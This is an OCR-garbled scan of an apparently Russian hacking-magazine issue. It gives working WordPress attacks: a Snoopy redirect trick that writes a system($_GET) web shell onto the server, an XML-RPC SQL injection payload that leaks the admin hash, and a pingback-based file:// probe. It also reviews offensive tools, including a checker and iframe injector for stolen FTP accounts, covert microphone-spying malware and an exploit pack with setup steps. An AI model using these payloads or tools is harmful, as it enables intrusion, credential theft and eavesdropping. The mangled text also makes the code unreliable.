в НЕБЕЗОПАСНЫЙ 5ІЧ00РѴ 

Настало время сделать еще один реверанс в 
сторону предыдущей статьи. Какты, навер- 
ное, помнишь, ѴѴогбРгезз 2.5.Х-2.6.Х позволял 
любому зарегистрированному пользователю с 
легкостью подменять В55-фиды в БазЬЬоагсІ. 
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АРХИВ РЕЛИЗОВ ВОРДПРЕССА 

Раскопав этотзамечательный баг немного глубже, мы с легкостью 
сможем добиться выполнения произвольного кода на сервере, где 
установлен блог. Итак, вспомним об обнаруженной забугорными кодо- 
копателями собе ехесуязвимости в классе Зпоору, который присутствует 
также и в вордпрессе. Сама уязвимость в вордпрессовском Зпоору была 
пропатчена с помощью езсарезНейсгтіб еще в 1 ,5.x ветке, но, тем не 
менее, разработчики взяли и испортили вполне работоспособный код 
непонятным патчем в версии 2.6.3. 

Я догадываюсь, чем они думали, смотря на постдевблога стакими 
словами: 

А ѵиІпегаЬіІіСу іп СЪе 8поору ІіЬгагу маз аппоипсесі 
Сосіау. Ѵ/огсІРгезз изез Зпоору Со НеСсЪ. Сііе Неесіз зЪоѵт 
іп Сііе БазкЪоагсІ. АІБЬоидЪ. Йііз зеешз Со Ье а Іоѵг гізк 
ѵиІпегаЬіІіСу Сог ШогсІРгезз изегз, ѵіе ѵ^апСесі Со деС ап 
ирсІаСе оиС ішшесііаСеІу . 

Атакже при сравнении кода Зпоору из ѴѴогбРгезз <= 2.6.2: 

ехес (езсарезкеіістсі ( $СМз->сиг1_раСІі . " -Б 
\ " $1іеа(іегСі1е\ " " . $стс!1іпе_рагатз . " \ " " . $заСег_ 

ІШІ . " \ " " ) , $гезиІСз , $геСигп) ; 

— с кодом Зпоору из ѴѴогбРгезз <= 2.6.5: 

ехес ( $СЬіз->сиг1_раСІі . " -к -Б 

\ " $кеа(іегСі1е\ " " . $стс!1іпе_рагатз . " \ " " . езсарезкеіістсі ( 
$ІЖІ ) . " \ , $гезиІСз , $геСигп) ; 

Второй код — это официальный патч разработчиков Зпоору, который 
закрывает предыдущий собеехес (но незакрываетновый]. Забавно, не 
правда ли? Зачем патчитьто, что итакбыло неплохо пропатчено? Ответы 
на эти вопросы мы вряд ли узнаем. 

Такая халатность разработчиков открыла мне путь кзамечательной 
уязвимости. Но обо всем по порядку. 

1. Способом из первой части статьи редактируй любую РЗЗ-ленту на 
главной странице админки, причем адрес ставь на свой хитрый скрипт, 
например. ШрУЛатег.сот/собе-ехес.рЬр ; 

2. Скриптсобе-ехес.рбр должен содержать следующий код: 

<?ркр 

Ьеасіег ( ' зеС-соокіе : 'есТю \'<?рЬр зузСеш ( $_СЕТ [аа] ) ; 

?>\ ' > . . /ѵф-сопСепС/СезС .ркр 4 =соока 1 ) ; 

Ьеасіег ( "БосаСіоп: кССрз : / /сЬСо-идосіпо . 
сот/ ?Теес1=гзз2 " ) ; 

?> 

После совершения этих действий на нужный блог в ./ѵѵр-сопІепіЛезСрбр 
зальется шелл. Теперь разберем, где и почему это возможно: 

1. Только на ѴѴогбРгезз 2.6.3, 2.6.5 (2.6.4 просто не было, а в 2.7 Зпоорууже 
практически не используется] с открытой регистрацией, необходимой 
для редактирования рсс-фидов; 



1 ІІТІІ 

А р т- . I А Ійіл м 11.44 рлгі іьа-ъ 

Ы 5чп№ Ар«4№І.2.4 шдб_«1 /г. ІА ОртИіЯ.Ъвгі 

К Р’&рѵйі-е-гі-йт: :РНР/5.Й*І р4р*: 111 БйсвЬЫг: Н\ь:///*:Ъй*л:кы 
1) е<мчп*<АіМі; сВ*и СйР^й(-Тт&іг ѴКйіпГ; 



РІЫ6ВАСК-К0ММЕНТАРИЙ 



йігесюгу V: Ѵітр і$ по* ѵѵггсеаЫе! 



ШИ 




Г ЬеггсІ шр-сопйд.ркр ю етаТІ 
С Маке и?ег асІтіп (шеей с)Ь Іодіп сіага) 

Сег к рѵѵпееГ! 

ЭКСПЛОЙТ КАЮР'А ДЛЯ 5Ы00РѴ 

2. Только на системах, где си гі установлен в/изг/ІосаІ/Ьіп/сигІ (наиболее 
распространенная система ста ким конфигом — РгееВЗО], так как этот са- 
мый пресловутый путь жестко прописан в ./ѵѵр-іпсіибез/сіазз-зпоору.рбр, 
плюсбинарниккурла проверяется на существование и исполнимость: 

ІТ ( ! $БЬ.із->сиг1_раЦ]т) 
гекигп Таізе; 

ІТ ( ТипсБіоп_ехізкз ( " із_ехесикаЫе" ) ) 

ІТ ( ! із_ехесикаЫе ( $ЦМз->сиг1_рак1і) ) 
гекигп Таізе; 

3. Это работает, потому что Зпоору поддерживает переадресацию (до 5 
раз по дефолту]. Во время нее он может установить кукисы и другие хэде- 
ры, которые пошлет серверный скрипт. Как можно понять из псевдопат- 
ча, над фильтрацией хэдеров при передаче их в ехес(] никто, конечноже, 
не задумывался. 
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4. Это работает не только в кукисах, но и во многих других 
заголовках. Например, мы сможем передать произвольный 

код в заголовке Н05Т следующим образом: 2. ./ѵѵр-іпсІисІез/роБІ.рИр 



ПипсСіоп ѵтр_іпзегС_аССас1ітепС ( $оЬд есС , 

<?р!ір $:Еі1е = Іаізе, $рагепС = 0) 

Ъеасіег ( "ЬосаСіоп: ІЩЦрз : / /Іаі 'ту еѵіі { 

соттапсГ . сот" ) ; 

?> 



Ез хитрый иршАй 

На очереди — замечательная ЗСИ-инъекция, обнару- 
женная товарищем Электом больше года назад во всех 
вордпрессах версий 2.2.х-2.3.х. Для ее использования 
юзер должен обладать правами «ирІоасИіІез» (то есть, роль 
Автора/Редактора]. Рассмотрим исходный код интерфей- 
са для удаленной публикации в ѴѴогсІРгезз — хтігрс.рбр 
(да-да, именно в этом файле было обнаружено наибольшее 
число 5С11_-инъекций движка]. В интерфейсе присутствует 
метод те1:аѴѴеЬІод.пеѵѵМесІіаОЬ]ес1, являющийся прямой 
отсылкой кфункции тѵѵ_пе\л/МебіаОЬ]ес1;. Проведем не- 
большой реверсинг: 

1. ./хтІгрс.рЬр 

ІипсСіоп тм_пемМесІіаОЪзесЦ ($агдз) 

{ 

$Ыод_ІБ = (іпС) $агдз[0]; 

$изег_1одіп = $ѵдэс1Ъ->езсаре ( $агдз [ 1] ) ; 
$изег_разз = $ѵфс!Ъ->езсаре ( $агдз [2 ] ) ; 

$сіаСа = $агдз [3 ] ; 



$пате = запіСІ2е_Пі1е_пате ( $ сІаДа [ ' пате ' ] ) ; 
$Суре = $с1аСа [ ' Суре ' ] ; 

$ЬіСз = $с1аСа [ ' ЬіСз 1 ] ; 



$аЦЦасЬпепЦ = аггау ( 

' розС_ЦіСІе ' => $пате, 

' розС_сопЦепС ' => ' ' , 

' розС_1:уре ' => ' аССасЬтепС ' , 

' розС_рагепС ' => $розС_іс1 / 

1 розС_тіте_Цуре ' => $Суре, 

' диісР => $ир1оас![ ' игі' ] 

) ; 

// Заѵе Щге сЗаСа 

$ ісі = ѵтр_іпзегС_аЦЦас1ітепЦ ( $аССас1ітепЦ , 
$ир!оасЗ[ ' ^ііе 1 ] , $розС_іс1 ); 



$оЬзесС = ѵгр_рагзе_агдз ( $оЬд есС , $сЗеПаиІСз) ; 
ехСгасС ( $оЪ б есС , ЕХТК_ЗКІР) ; 



ІЗ? ($ирсЗаСе) { 

$ѵдэсІЪ->диегу ( 

"БРБАТЕ $Ѵф(ЗЪ->розЦз ЗЕТ 
розЦ_аиЫтог = 1 $розЦ_аиШюг ' , 
розС_с1аЦе = ' $розС_с1аЦе ' , 
розС_с1аЦе_дтЦ = ' $розС_с1аЦе_дтЦ 1 , 
розС_сопЦепЦ = ' $розС_сопСепЦ 1 , 
розЦ_сопСеп1і_^іІЦеге(і = 

' $розЦ_сопЦепЦ_Пі1ЦегесЗ ' , 
розЦ_ЫШе = ' $розС_ЦіСІе ' , 
розС_ехсегрС = ' $розС_ехсегрС ' , 
розС_зСаЦиз = ' $розС_зСаЦиз 1 , 
розС_Ьуре = ' $розС_Суре ' , 
соттегШ_зЦаЦиз = ' $соттепЦ_зСаЦиз ' , 
ріпд_зСаСиз = ' $ріпд_зСаСиз * , 
розС_раззѵ\гогс1 = ' $розС_раззѵ\гогс1 ' , 
розС_пате = ' $розС_пате ' , 

Со_ріпд = ' $Со_ріпд' , 
ріпдесі = ' $ріпдесР , 
розС_тосІі:Еіес1 = 

1 " . сиггепЦ_Ьіте ( ' тузді ' ) . " 1 , 
розС_тосіі:Еіес1_дт1: = 

1 " . сиггепЦ_Ь іте ( ' тузді ' , 1 ) . " 1 , 
розС_рагепС = ' $розС_рагепС ' , 
тепи_огсіег = ' $тепи_огс1ег ' , 
розС_тіте_Ьуре = ' $розС_тіте_Суре ' , 
диісЗ = ' $диісі ' 

ШЕКЕ ІБ = $розЦ_ІБ" ) ; 

} 

} 

Проследив весь путь переменной $1уре,ты поймешь, что 
никто не позаботился о ее фильтрации перед вставкой в 
5СП_-запрос :). Поэтому мы легко сможем проинжектить 
ІЭРОАТЕ-запрос, например, пославтакой Р05Т-пакетк 
хтігрс.рбр: 



^ взлом 




[ НТТР://ѴѴѴѴѴѴ 

1 г 

> Ііпкз 

• зесипіа.сот/ 
Абѵізопез/32361 — 

абѵізогу на знамена- 
тельную дыру 
в Эпоору. 

• 

— история всех 
багов вордпресса. 

• ѵѵогбргезз.огд/ 
боѵѵпіоаб — скачать 
последнюю версию 
ѴѴогсІРгезз. 

• ѵѵогбрге: 

беѵеІортепІ:/2008/1 0/ 
5-263 — пост 
девблога, посвя- 
щенный выходу2.6.3 
версии ѴѴогсІРгезз. 

• уѵііМк.сот/агсЫѵез 
/ЫЬсигІ агЫігагу 

біе ассезз.рсб — 
уязвимость 
редиректа в си гі. 




> іпіо 

• Спасибо РагОг 
за написание собе 
ехес эксплойта для 
ѴѴогбРгезз 2.6.x, а так- 
же Еіекіза предостав- 
ленные уязвимости. 
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<?хт1 ѵегзіоп= " 1 . 0 " епсос!іпд= "ІІТЕ-7- 
" ?><теШіо(іСа11> 

<те1:Ь.осЗЕГате>'9ф . ир1оа<іЕі1е</теЦЪосШате> 
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10- я 1001 II [Фтыгіи 

ЗЛОПОЛУЧНЫЙ СНАЫ6Е5ЕТ В 5Ы00РУ 



<рагашз> 

<рагатхѵа1иехзкгіпд>1</зкгіпдх/ 
ѵаіиех /рагаш> 

<рагатхѵа1иехзкгіпд> [ИМЯ_АВТО- 
РА] </ зЬгіпдх /ѵаіиех /рагаш> 
<рагашхѵа1иехзРгіпд> [ПАРОЛЬ_АВ- 
ТОРА] </зВгіпдх/ѵа1иех/рагаш> 
<рагашхзВгисВ> 

<шешЬег> 

<пате>пате</пате> 

<ѵа1ие>ххх . ді:Е</ѵа1ие> 

</шетЬег> 

<тетЬег> 

<пате>Суре< /пате> 

<ѵа1ие>ді^' , (зеІесВ сопсаВ (изег_ 
Іодіп, 1 : ' ,изег_разз) Тгот ѵф_изегз 
ІітіС 1) ) /*</ѵа1ие> 

</шетЬег> 

<тетЪег> 

<пате>ЬіВз</пате> 

<ѵа1ие>НЕЬЬО УГОКЬБ ! </ѵа1ие> 
</шетЬег> 

</зВгисВ> 

</рагат> 

<рагатхѵа1иехзВгіпд>77</ 
зВгіпдх /ѵаіиех /рагат> 
</рагатзх/теДЪос1Са11> 

После отправки пакета на блогжертвы поторо- 
пись пройти в админку: Мападе => Ібріоасіз. В 
поле «ШИ» в случае удачного срабатывания 
эксплойта ты увидишь хеш и парольадмина. 

в ФОКУСЫ С КУРЛОМ 

Представляю твоему вниманию очередную 
уязвимость ѴѴогсІРгезз (найденную не без 
помощи Электа], которая заключается в 



проверке существования любого файла на 
уязвимом блоге. Подвержены все версии 
движка, начиная с 2.7. Для начала нужно 
сказать, что это не совсем уязвимость Ворд- 
пресса, а, скорее, фича сигі, рбр-библиотеку 
которого как раз и юз а ет ѴѴогсІРгезз вместо 
ушедшего в небытие Впоору. Итак, уязвимость 
курла заключается в том, что он с радостью 
м ожет прочитатьдлятебяне тол ь ко уда лен- 
ные файлы по ЫТр, но и локальные с помощью 
префикса «біе://»! Но, как правило, префиксы 
проверяются скриптами еще на входе и, каза- 
лось бы, «біе://» за юзать невозможно. Однако 
никто не подумал о том, что сигі поддерживает 
переадресацию с помощью флага «СІІНІ_ОРТ_ 
РОІ_І_ОѴѴІ_ОСАТІОІ\І». То есть, — подставив 
курлу вполне обычный ЫТр, на выходе мы 
можем получить чтение произвольного 
локального файла (подробное асіѵізогу от пер- 
вооткрывателя ищи в сносках]! В вордпрессе 
множество файлов юзают класс ./ѵѵр-іпсіибез/ 
Ыір.рбр, но сейчас мы рассмотрим лишь один 
из наиболее доступных рге-аиіб способов 
эксплуатации баги (найти другие способы в 
админке — твое домашнее задание:]]. 

Для начала рассмотрим некоторые особенно 
важные для эксплуатации бага куски кода в 
последней версии вордпресса (2.7.1]: 

1. ./ѵѵр-іпсіибез/біір.рбр 

сіазз Ѵ\П?_НЦЦр_Сиг1 { 

РипсСіоп гедиезС ( $иг1 , 

$агдз = аггау ( ) ) { 

ІТ ( ! іпі_деС ( ' заРе_шос1е ' ) 

&& ! іпі_деС ( ' ореп_Ьазес!іг ' ) ) 
сиг1_зеСорЦ ( $Ь.апс11е, 
СІШЬ0РТ_Р0ЬЬ01ЛЩ0САТІ(Ж , 



Сгие ) ; 

Да-да! Ты видишь тот самый флаг, отвечающий 
за поддержку ред и ре кта! 

Дальше опустим заумный код, но скажулишь, 
что по дефолту (всего возможны четыре 
варианта] в качестветранспорта Ыір-данных 
вордпресс выбирает курл: 

ЕипсСіоп мр_гетоСе_деЦ ( $иг1 , $агдз 
= аггау ( ) ) { 

$оЬдРеЦсЪЗіСе = 

_ѵф_1гЦЦр_деЦ_оЬд есС ( ) ? 
геСигп $оЬдРеСс1і8іЦе->деЦ ( $иг1 , 
$агдз) ; 

} 

2. Функция, приведенная выше, используется в 
./ѵѵр-іпсІибезЛипсбопз.рбр: 

Типскіоп ѵф_гетоке_:Еореп ( $игі ) { 

$гезропзе = ѵф_гетоке_дек ( $игі, 
$орСіопз ) ; 

} 

3. И, наконец, эта же функция используется в 
уже полюбившемся тебе интерфейсе хтігрс: 

^ипсСіоп ріпдЬаск_ріпд ( $агдз ) { 

$раде1іпкесІ:Егот = $агдз[0] ; 
$раде1іпкесШо = $агдз[1]; 
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Все готово для проверки наличия файла с:\ 
ЬооЕіпі натестируемой системе. 

Для эксплуатации уязвимости тебе необходи- 
мо лишь послать следующий Р05Т-пакетдля 
сервера хтігрс: 

<теккос1Са11> 

<текЬосШате>ріпдЪаск . ріпд< / 
теккюсШате> 

<рагатз> 

<рагатхѵа1иехзкгіпд>кккр : // 
Іашег . сот/ріпд1/?р=2</зкгіпдх/ 
ѵа1иех/рагат> 



Юрт! І1ЙЛКІ ,Г 



I . 1 1 . 1 1 1 1 1 , 1 ЧУиііІР'пчіі 7 . Г I 



ДОМАШНЯЯ СТРАНИЦА ВОРДПРЕССА 

П«К4*Ы< і#т ілпікн 0 - 0 11 ««г*. Элпрк ]*н«і О.ОООІі с «к» 

$ОІ»лпро« 

5ЕІЕСТ - 

МОН «р_р«1гічіЗі 

ымгиэ.-да 

ІПрядка] [Оплсаіъ 501] [Создать РНР-кцд] |0Й ноешь] 

Покздатъ| |ЯГ рядов от и 

в Ігйрнмытйдьнйм режиме, нгвдшвкн поело вджаъиг іоо ячее 

*-Т- т*М_№ раіі_И йіѵіл_Ьвд т*и_ѵаГие 

^ К 26 1 _иф_рад_*Іид іѴск-ет-вІІ 

Ц Спустить все / Снять отметку со осев С стмвчвтыш: А X К 



<рагатхѵа1иехзкгіпд>Ьккр : // 
Іашег . сош/ріпд2 / ?р= [ИД_СУЩЕСТВУ- 
ЮЩЕГО_ПОСТА_НА_БЛОГЕ] # Іашег . сот/ 
Ыод</зкгіпдх/ѵа1иех/рагат> 
</рагатз> 

</теккюсіСа11> 

После отсылки пакета ты сможешь получить 
два ответа от сервера: 

1. Если файл сДЬооЕіпі существует, то блог 
пришлеттакой ответ — 

РіпдЬаск кгот Ьккр :/ /Іашег . сот/ 
ріпд1/?р=2 ко Ьккр: //Іашег . 
сош/ріпд2 / ?р=1#1атег . сот/Ыод 
гедізкегесі. Кеер кке ѵгёЪ каікіпд! 
:-) 



ѴѴР_0Ю_5Ш6, ЗАПИСАННЫЙ В БАЗЕ 



2. Если такого файла нет, то жди такого ответа — 



// Ьек ' з сЬеск кке гешоке зіке 
$1іпеа = ѵ\гр_гетоке_кореп 

( $раде1іпкес!кгот) ; 



Теперьунасестьвсе необходимое для написа- 
ния эксплойта, — к чему мы сейчас и приступим. 

н А БЫЛ ЛИ ФАЙЛ? 

Какты уже понял, действовать мы будем через 
механизм пингбэков, про который я уже неод- 
нократно рассказывал в предыдущих номерах. 
Для работы нам понадобятся два файла, до- 
ступных по ННр. Например.такие: ЬИрУЛатег. 
сот/ріпді/іпбех.рбр и ЬНр://[атег.сот/ріпд2/ 
іпбех.рбр . 

Предположив, что адрес нашего блога — Іатег. 
сот/Ыод и что тестовым стендом является Вин- 
да, начнем работу над необходимыми файлами: 

1 . ./ріпд 1/іпсІех.рКір 

<?ркр 

кеасіег ( "<кік1е>Ехр1оік</ 
кікіеха кгек= "кккр : / / Іашег . сот/ 
ріпд2 / ?р=1#1ашег . сот/Ыод" >Сиг1</ 
а> " ) ? 

кеасіег ( " Ьосакіоп: кі1е:///с: \Ьоок . 



іпі " , 3 02) ; 

?> 

2. ./ріпд2/іпс!ех.рНр 

<а кгек="кккр: //Іашег . сот/ 
ріпді/ ?р=2 " >Ріпд2</а> 

В этом примере первый файл сможет пропинго- 
вать второй, благодаря еще одной недоработке 
вордпресса. Смотри в механизм пингов хтігрс. 
рЬр: 

// СЬеск ік кке раде ІіпкесЗ ко із іп 
оиг зіке 

$роз1 = зкгроз ( $раде1іпкес!ко , 
зкг_гер1асе ( аггау ( ' кккр : / / 
шт. ' , ' кккр: // ' , ' кккрз : // 
тт. ' , ' кккрз ://'), ' 1 , дек_ 
оркіоп ( ' коте ' ) ) ) ; 
ік ( ! $роз1 ) 

гекигп пем ІХК_Еггог ( 0 , 

( ' Із ккеге по Ііпк ко из? ' ) ) ; 

В этой проверке вовсе не нужно, чтобы второй 
пингуемый сайтобязательно был текущим бло- 
гом, так как мы можем обойти проверку, вставив 
адрес этого самого блога. Например, в конце 
ШЕпосле решетки. 



ТЬ.е зоигсе ІЖЬ сіоез пок ехізк. 

Кстати, этим способом было бы вполне воз- 
можно прочитать содержимое любого файла 
системы, если бы пингбэк не урезался до очень 
малого количества символов. Так что, в ком- 
мента ри и -пин гбэке ты увидишь лишь что-то 
вроде: 

[...] Зегѵег : Араске/2 . 2 . 4 (Мп32) 
тос1_зз1/2 . 2 . 4 ОрепЗЗЬ/О . 9 . 8сІ 
РНР/5 .2.4 Х-Ромегесі-Ву : РНР/5.2.4 
рора: 111 Ьосакіоп: кііе : / / /с : Ьоок . 
іпі Сопкепк-Ьепдкк : 0 Соппескіоп: 
сіозе Сопкепк-Туре : кехк/ккші; [ . . . ] 

Содержимое сЛЬоокіпі остается где-то под 
катом :). Описанный способ эксплуатации 
уязвимости не является единственным. 

В админке ты сможешь найти и другие вызо- 
вы функции ѵѵр_д еі_Ы:1:р () , которые позволят 
тебе читать файлы на системе. Найти их — 
уже твоя задача. 

ЕЭ ТО ВЕ СОЫТІЫІІЕО... 

Ну что, ты все еще считаешь ѴѴогсІРгезз безо- 
пасным движком? 

Не забывай: злостные кодокопатели еже- 
дневно вдоль и поперек мучают ѴѴогсІРгезз 
собебазе. Как говорится, «Продолжение 
следует...» :)! т 
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РТР-чекер нового поколения :) 

Потребность в работоспособных Кр-чекерах 
есть всегда. Именно поэтому я уже представлял 
твоему вниманию несколько интересных про- 
дуктов. А сегодня хочу порадовать еще одной 
достойной тул зой — ЕТР-ТооІк. Это мощный 
инструмент для работы с фтп-акками, нако- 
денный на РНР Описывать все преимущества 
чекера — дело неблагодарное, поэтому коротко 
перечислю л ишь основные возможности: 

• Аплоад файлов через веб-интерфейс 

• Чекер ібр-акков на валидность 

• Встроенный ифраймер (добавление 
кода в начало/конец файла) 

• Поиск и удаление чужих іРгаше-вставок 

• гип-біте статистика 

• Удобочитаемые логи 

• Поддержка продолжения чека (то 
есть, если скрипт не закончил провер- 
ку, то при следующем запуске чекер 
начнет работать только с теми акками, 
которые не успел прочекать) 

• Отчистка ібр-листа при импорте 
(удаление анонимных акааунтов) 

• Встроенный парсер валидных/нева- 
лидных акков 

• Наличие полноценной статистики за 
весь период работы скрипта 

• Возможность остановки чекера и всех 
его запущенных копий, путем создания 
в папке с чекером файла «збор» 

Кроме того, в состав чекера входит функцио- 
нальный парсер, с помощью которого ты без 
труда сможешь отсортировать фтп-акки по 
заданным параметрам: 

• Выборка акков по странам 

• Выборка акков по Соодіе РадеКапк (РК) 

• Возможность проверки указанного 
числа аккаунтов с заданными парамет- 



рами (РК/ страна) 

— Возможность сортировки акков по 
бюзбпате 

Чекер поддерживает стандартный вид акка- 
унтов: 

— ббр : / /Іодіп : разз@зегѵег 
— Іодіп : разз@зегѵег 

С установкой тулзы проблем возникнуть не 
должно. Тебе потребуется залить содержимое 
архива насвой(илине совсем свой:]] сервер, 
установить права на запись для каталога ./ 
ГСр_ІооІ5/ирІ.оаб, создать новую БД и отредак- 
тировать конфиг ту5ц[_сопбд.рЬр: 

<?рЪр 

$бЪ_бюзб = " Іосаібюзб " ; 

# хост 

$сПэ_изег = " гооб"; # юзер БД 
$сПэ_раззж1 = "гооб"; # пароль 
$бЬ_пате = " ббрз" ; # название БД 
?> 

После этого можешь смело приступать к 
процессу инсталла по линку ЫТр://твой_хост/ 
ІірДюоІз/іпзІаІІ.рбр. 

Да, и не забудь добавить базу ОеоІР в соответс- 
твующий каталог ./ІірДюоІз/БеІІеМюоІ/ОеоІР. 
баб Для работы утилы потребуется РНР => 4.0.3 
версии с отключенным За^Мобе, а также 
МуЗОблюбой версии. 



ПІ.І 
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машыадша місбрѵ 

ЕНуіМСОѴЗ 2000/ХР 



АВТОР: 



|ЗІ_ЕЗН 

Утебя никогда не возникало желания подслу- 
шать чужой разговор? Все с детства знают, что 
подслушивать нехорошо, но если оченьхочется 
— выходесть! Нет, мы не будем ваять модный 
жучокили подключаться к телефонной линии. На 
этот раз мы просто воспользуемся микрофоном, 
правда, чужим :]. А поможет в этом утила МісЗру 
отЗбЕЗН'а.Тулза пока на стадии тестирования и 
распространяется в бета-версии, однако больше 
всего нас интересует сам а идея и сорцы. Смысл 
работы тулзы заключается в скрытой записи 
звука при помощи соответствующего дефолто- 
вого устройства в системе, коим может являться, 



например, внешний или встроенный микрофон. 
При включенном компежертвы мы можем 
запросто писать все разговоры в радиусе дося- 
гаемости (зависит, в первую очередь, от качества 
микрофона]. Размер^пилы немногим превышает 
7 Кб. При этом функционал приятноудивляет: 

• Данные записываются в аудио-файл 
формата .трЗ, 24 КГц 32кбит/с, моно 

• Для записи используется стандарт- 
ный виндовый кодек МРЕС ЬАУЕК-3 

• Название каждого файла с записью 
указывается в виде : год_месяц_день_ 
час -минуты- секунды .трЗ 

• Наличие админки, которая по дефол- 
ту поднимается на порту 4545 

Теперь немного об админке. С помощью панели 
управленияты можешь: 

• Начинать/останавливать запись 

• Просматривать листинг записанных 
файлов , получать размер каждого и т . п . 

• Удалять записанные файлы 

• Скачивать записанные файлы 

Р.З. В архиве с утилой лежат и сорцы: 
МісЗру. брг — основная часть тулзы, 
включая реализацию админки 
АРІ.раз — константы, типы и функции 
МісКес.раз — функции записи 

Словом, при наличии прямых рук открывается 
широкий простордля фантазии. Использовать 
подобную идею можно в разных направлениях 
(обязательно благих :]). Так что — дружно гово- 
рим «спасибо»5бЕ5Н'у и идем вникать в сорцы. 
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ПРОГРАММА: 



АВТОР 



УЕВ5ЕСШГГТ5ѴЗТЕМ 

|*ІЧІХ/УІІЧ 

АѴАС'АМЕІ АМОРЕІ 



В последнее время широкое распространение 
получили разнообразные детекторы атак, ло- 
гирующие все действия злоумышленника. Я же 
хочу обратить твое внимание на несколько иной 
продукт — ѴѴеЬЗесигіІуЗузІепгі — предназначен- 
ный для защиты отХ55, ЗОЫщесбоп, ПЕІ-атак. 
Поверь, это не пустые слова! Система реально 
работает (разумеется, при грамотной настройке 
:]]. Из преимуществ продукта стоит отметить: 



• Быстрая работа с РНР-файлами 

• Быстрое обнаружение уязвимостей и 
их устранение 

• Логирование всех атак в БД 

Админка системы позволяет: 

• Просматривать ІР-адреса атакующих 

• Получать информацию о типах атак 

• Просматривать все логи по конкрет- 
ному ІР-адресу атакующего 

Крометого, в софтине реализована проверка 
глобальных переменных: 

• $_СЕТ 

• $_РОЗТ 

• $_ЗЕЕѴЕЕ 

• $_ЗЕЗЗІСЖ 

• $_СООКІЕ 

В качестве переменных для $_5ЕПѴЕН исполь- 
зуются: 

" НТТР_АССЕРТ " , " НТТР_АССЕРТ_ 
СНАЕЗЕТ" , ,, НТТР_АССЕРТ_ЕБСОБІШ" , 

" НТТР_АССЕРТ_ЬАШБАСЕ " , " НТТР_ 
СОШЕСТІОБ" , ,, НТТР_НОЗТ" , М НТТР_ 
ЕЕЕЕЕЕЕ" , "НТТР_БЗЕК_АСЕБТ" , 

" 3 Е ЕѴЕ Е_АБМ I N " , " ЗЕЕѴЕЕ_РОЕТ " , 

" ЗЕЕѴЕЕ_3 ІСБАТБЕЕ " , " РНР_АБТН_ 
БІСЕЗТ" , " РНР_АБТН_БЗЕЕ" , "РНР_ 
АБТН_РМ " , " АБТН_ТУ РЕ " . 

Помимо конфига, который располагается в 
файле сопбд.рбр, настоятельно рекомендую 
изучить содержимое скрипта ргІ_зуз1:епп.рЬр, 
ибо в нем сосредоточены основные настройки 
и функции системы: 



• ЕшіРЗузбет() — основные функции 
для запуска сканирования системы 

• ЗебЗсапЕопе ( $ѵбіісбц $ѵа1ие) — ис- 
пользуется при сканировании глобаль- 
ных переменных 

• ЗебБопеРгобесбіоп ( ) — определяет 
уровень защиты (1 — минимальный) 

• ЗебАІІРгобесбіоп ( ) — устанавливает 
высший уровень защиты — 7 

• ЗеШагпіпдЬеѵеІ ( [$1еѵе1] ) — опре- 
деляет уровень предупреждений 

• ЗебМеззадеТоАббаскег ( [$збюѵ\г| , [$те 



фигури руем систему безопасности ѴѴ55 

ззаде] ) — отправка сообщения атакую- 
щему при обнаружении атаки 

• ЗебРабсЬѴагз ( [$ѵа1ие] ) — определе- 
ние действий в случае атаки 

• ргіѵабе $РгобесбіопБеѵе1 = 7; 

// Ргобесбіоп Іеѵеі 

• ргіѵабе $ШагпіпдБеѵе1 = 3 ; 

// Магпіпд Іеѵеі 

• ргіѵабе $Музд1ІБ = -1; 

// Музді Соппесбіоп ІБ 

• ргіѵабе $ЗПоѵтМеззаде = ТЕБЕ; 

// Іб ме бебесб зотебкіпд тле збютл ап 
теззаде 

• ргіѵабе $ЕѵепбМеззаде = "Ассез 

Ѵіоіабіоп! " ; // Меззаде &Ь.ст 

іп сазе об аббаск бебесбіоп 

• ргіѵабе $РабскѴагз = 

ТЕБЕ; // РабсЪ. ѵаіие 

бгош бебесбеб ргоЫетз 

• ргіѵабе $Ео11отлАббаскег = ТЕБЕ; 

// Збоге аіі іпбогтабіоп аЬоиб 
аббаскег бгот потл оп 

• ргіѵабе $ЕхізбТкгеабз = ЕАБЗЕ; 

// Зесигібу Ткгеабз 

• ргіѵабе $ЗесигібуТЬгеабз = 

аггау (аггау (аггау ( ) ) ) ; //Збоге 

бкгеабз іб ехізбз 

• ргіѵабе $ЗузбешѴегзіоп = "1.4"; 

// Зузбеш Ѵегзіоп 

• ргіѵабе $ЗузбешБрбабеБіпк = " " ; 

// Ноіб ирбабе Ііпк 

• ргіѵабе $ЗузбешБрбабеѴегз = " " ; 

// Ноіб ирбабе ѵегзіоп 

• ргіѵабе $ЕхсербіопѴагз = 

аггау ( ) ; / / Ббіб 

зресіаі скескз ѵагз 

Нуа сам конфигсопбд.рбр выглядит достаточно 
просто: 

<?рЪр 

$изег = "Апбгеі" ; //логин админа 
$разз = "тлзз" ; //пасс админа 
/ / данные для подключения к СУБД 
$соппесбіоп = аггау (" зегѵег" => 

" Іосаібюзб " , 

"изег" => " гооб" , 

"разз " => " " , 

"бабаЬазе" => "вдзз") ; 

//ИАШІШ ! ! іб уои ебіб зеббіпдз 
Ъеііотл уои шизб ебіб зеббіпдз бгош 
бЬе ргб_зузбеш.ркр бііе. . 
$ТаЫеРгебіх = "ргб_зуз_" ; 

// префикс таблиц 
$ТаЫеМаіп = "таіп" ; 

/ / основная таблицы 
$ТаЫеАббаскегз 



// таблица с логированием атак 
$ТаЫеСасЬ.е = " сасйе"; 

// таблица с информацией об 
атакующих 
?> 

Смело заливай софтину на свой сервер и при- 
ступай кконфигурации. И помни, безопасности 
много не бывает. 

ІНаіщНШииіоиЕ раск ѵ. і . і 

Ва*міх/уін 




КонфигИтдие Раск 

Какты уже знаешь, найти хорошую связку в пабли- 
ке — задача непростая. Я решил поделиться одной 
из приватных версий связки ІІпідие Раск ѵ. 1.1. Она 
уже вовсю гуляет по полупривату и в недалеком бу- 
дущем окажется в па блике, та к что считай подарок 
не более чем тестовым продуктом перед покупкой 
лицензионной версии. Что изменилосьв релизе: 

• Изменена выдача РБЕ-файла (кроме 
самого сплойта, генерируется РБЕ- 
файл с рандомными значениями) 

• Обновлен РБЕ-сплойт (теперь ис- 
пользуется БоиЫе РБЕ новой и старой 
версии совместно) 

• Изменен метод шифрования сплойтов 

Установить связку несложно: 

• Заливаем файлы на абузный сервер 

• Заливаем свой ехе 1 шник в папку со 
связкой с названием 1 . ехе 

• Создаем базу данных 

• Открываем файл сопбід.ркр и вписы- 
ваем данные базы, полный линк до рбб. 
рЬр и полный линк до Іоаб.рЬр, а также 
логин/пароль на доступ к статистике 

• Вбиваем в браузере адрес Иббр: // 
